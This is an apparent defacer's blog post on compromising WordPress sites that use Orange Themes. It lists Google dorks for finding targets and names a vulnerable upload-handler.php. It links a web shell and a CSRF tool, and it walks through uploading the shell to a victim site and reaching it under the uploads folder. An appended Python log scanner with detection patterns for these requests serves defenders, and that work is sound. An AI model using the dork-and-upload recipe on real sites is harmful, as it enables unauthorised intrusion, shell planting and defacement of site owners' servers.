Deface PoC WP Orange Themes
Friday, February 14, 2020
Dork :
inurl:"/wp-content/themes/agritourismo-theme/
inurl:"/wp-content/themes/bordeaux-theme/
inurl:"/wp-content/themes/bulteno-theme/
inurl:"/wp-content/themes/oxygen-theme/
inurl:"/wp-content/themes/radial-theme/
inurl:"/wp-content/themes/rayoflight-theme/
inurl:"/wp-content/themes/reganto-theme/
inurl:"/wp-content/themes/rockstar-theme/
Exploit: /wp-content/themes/bordeaux-theme/functions/upload-handler.php
Shell: Download
Csrf Online: Touch Me!
Vulnerable? It looks like this, for example
then execute it using the CSRF Online tool above
URL = (enter your vulnerable site here)
Postfile = orange_themes
Shell access: site.com/wp-content/uploads/(year)/(month)/filename.php
*the year/month numbers can vary (depending on the date)
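For site owners, the two requests described above leave a recognisable trail in the web server access log. The following is an added example, not part of the original post: a log check that flags POSTs to the theme upload handler and PHP files requested from the dated uploads tree. It assumes Combined Log Format and that the handler sits at the same relative path in every affected theme; the sample lines are constructed.

```python
import re

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Handler path named in the post; matching any theme directory is an assumption.
HANDLER = re.compile(
    r'^/wp-content/themes/[^/]+/functions/upload-handler\.php', re.I)
# PHP requested from the dated uploads tree, e.g. /wp-content/uploads/2020/02/x.php
UPLOADED_PHP = re.compile(
    r'^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.ph(?:p\d?|tml)(?:[/?]|$)', re.I)


def scan(lines):
    """Return (line_no, client_ip, kind, path, status) for suspicious requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _ts, method, path, status = m.groups()
        status = int(status)
        if method == "POST" and HANDLER.match(path):
            findings.append((n, ip, "handler_post", path, status))
        elif UPLOADED_PHP.match(path):
            # A 200 means the server returned the script; anything else is a probe.
            kind = "uploads_php_served" if status == 200 else "uploads_php_probe"
            findings.append((n, ip, kind, path, status))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [14/Feb/2020:10:01:02 +0000] "POST /wp-content/themes/'
    'bordeaux-theme/functions/upload-handler.php HTTP/1.1" 200 51 "-" "-"',
    '203.0.113.7 - - [14/Feb/2020:10:01:09 +0000] "GET /wp-content/uploads/'
    '2020/02/namafile.php HTTP/1.1" 200 1204 "-" "-"',
    '198.51.100.4 - - [14/Feb/2020:10:02:00 +0000] "GET /wp-content/uploads/'
    '2020/02/photo.jpg HTTP/1.1" 200 88211 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Feb/2020:10:03:00 +0000] "GET /wp-content/uploads/'
    '2019/11/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any `handler_post` or `uploads_php_served` hit warrants removing or updating the affected theme and reviewing the uploads directory for unexpected `.php` files. Configuring the web server so that PHP is never executed from `/wp-content/uploads/` limits the impact of this class of upload flaw.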